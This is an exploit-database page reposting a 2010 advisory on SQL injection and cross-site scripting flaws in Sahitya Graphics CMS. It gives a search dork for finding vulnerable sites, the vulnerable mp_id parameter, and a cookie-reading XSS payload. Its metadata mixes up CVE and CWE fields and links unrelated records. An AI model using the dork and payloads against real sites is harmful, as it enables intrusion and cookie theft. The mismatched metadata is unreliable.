header-logo
Suggest Exploit
vendor:
Sahitya Graphics CMS
by:
Dr.0rYX and Cr3w-DZ
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Sahitya Graphics CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2010-4456
CPE: a:sahitya_graphics:sahitya_graphics_cms
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2010

Sahitya Graphics CMS Multiple Remote Vulnerabilities

Sahitya Graphics CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Upgrade to the latest version of Sahitya Graphics CMS
Source

Exploit-DB raw data:

 
 Exploit Title:Sahitya Graphics CMS Multiple Remote Vulnerabilities  
 Date: 12.10.2010  
 Author: Dr.0rYX and Cr3w-DZ  
 Category: webapps/0day  

****************************************************************************************************
*           _______       ___________.__                     ___________      .__                  *
*      ____ \   _  \______\__    ___/|  |__           _____  \_   _____/______|__| ____ _____      *
*     /    \/  /_\  \_  __ \|    |   |  |  \   ______ \__  \  |    __) \_  __ \  |/ ___\\__  \     *
*    |   |  \  \_/   \  | \/|    |   |   Y  \ /_____/  / __ \_|     \   |  | \/  \  \___ / __ \_   *
*    |___|  /\_____  /__|   |____|   |___|  /         (____  /\___  /   |__|  |__|\___  >____  /   *
*         \/       \/                     \/               \/     \/                  \/     \/    *
*                                      .__  __             __                                      *
*      ______ ____   ____  __ _________|__|/  |_ ___.__. _/  |_  ____ _____    _____               *
*     /  ___// __ \_/ ___\|  |  \_  __ \  \   __<   |  | \   __\/ __ \\__  \  /     \              *
*     \___ \\  ___/\  \___|  |  /|  | \/  ||  |  \___  |  |  | \  ___/ / __ \|  Y Y  \             *
*    /____  >\___  >\___  >____/ |__|  |__||__|  / ____|  |__|  \___  >____  /__|_|  /             *
*         \/     \/     \/                       \/                 \/     \/      \/              *
*                                                        Pr!v8 Expl0iT AND t00l **                 *                                                                  
*                                      ALGERIAN HACKERS                                            *      
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
 
[!]            Sahitya Graphics CMS Multiple Remote Vulnerabilities   
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>  &  Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
 
***************************************************************************/
[!] notice :
 Dr.0rYX:  MY OLD EMAIL VX3@HOTMAIL.DE  CLOSED
           MY NEW EMAIL IS  SNIPER-DZ@HOTMAIL.DE

***************************************************************************/
[ Software Information ]
 
[+] Vendor   : http://www.sahityagraphics.com.au/
[+] script   : Sahitya Graphics CMS
[+] Download :http://www.sahityagraphics.com.au/overview.html (sell script )
[+] Vulnerability : BLIND SQL injection Vulnerability / XSS Vulnerability
[+] Dork : inurl:"index.php?mp_id=" Sahitya
 
**************************************************************************/
[ Vulnerable File 1]
 
http://server/index.php?mp_id=sql[N.A.S.T ]

[ Exploit 1 ]
 
http://server/index.php?mp_id=1 BLIND SQL INJECTION 


*************************************************************************/
[ Vulnerable File 2]

http://server/index.php?mp_id=xss[N.A.S.T ]

[ Exploit 2 ]
http://www.server/index.php?mp_id='><script>alert(document.cookie)</script>

[  GReet ]
 
[+] : Exploit-db.com , all hackers muslims

Navigation

Suggest Exploit

Services By CQR